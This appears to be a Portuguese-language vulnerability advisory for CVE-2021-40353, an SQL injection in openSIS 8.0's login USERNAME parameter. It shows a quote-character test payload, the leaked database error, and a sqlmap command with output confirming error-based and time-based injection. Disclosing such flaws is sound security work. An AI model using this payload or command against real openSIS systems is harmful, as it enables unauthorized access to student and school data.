
CVE-2021-40353 openSIS 8.0 Vulnerabilidade de Injeção de SQL
CVE-2021-40353 Vulnerabilidade de Injeção SQL no openSIS 8.0 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40353
Existe uma vulnerabilidade de injeção SQL na versão 8.0 do openSIS quando MySQL ou MariaDB é usado como banco de dados da aplicação. Um atacante pode então emitir o comando SQL através do parâmetro USERNAME.
Página PHP vulnerável:
index.php – parâmetro USERNAME
Payload vulnerável ' – produzirá um erro com informações do banco de dados " – não produz o erro
Erro
Data:
08/31/2021 03:16:22
Aviso de Falha:
Falha na Execução do DB
SQL: UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER('user1'') Traceback: C:\xampp\htdocs\opensis\index.php at 502 Informação Adicional: Você tem um erro na sua sintaxe SQL; verifique o manual que corresponde à versão do seu servidor MariaDB para a sintaxe correta perto de ''user1'')' na linha 1 Data:
08/31/2021 03:16:22
O openSIS encontrou um erro que pode ter resultado de qualquer um dos seguintes:
Entrada de dados inválida
Erro SQL do banco de dados
Erro de programa
Por favor, tire esta captura de tela e envie-a ao seu representante openSIS para depuração e resolução.
sqlmap -r post_opensis -p USERNAME
[09:38:19] [INFO] POST parameter 'USERNAME' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable [09:38:19] [INFO] testing 'MySQL inline queries' [09:38:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)' [09:38:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries' [09:38:22] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)' [09:38:22] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)' [09:38:23] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)' [09:38:23] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' [09:38:24] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [09:38:46] [INFO] POST parameter 'USERNAME' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Descoberto por Brian Lowe, Agosto de 2021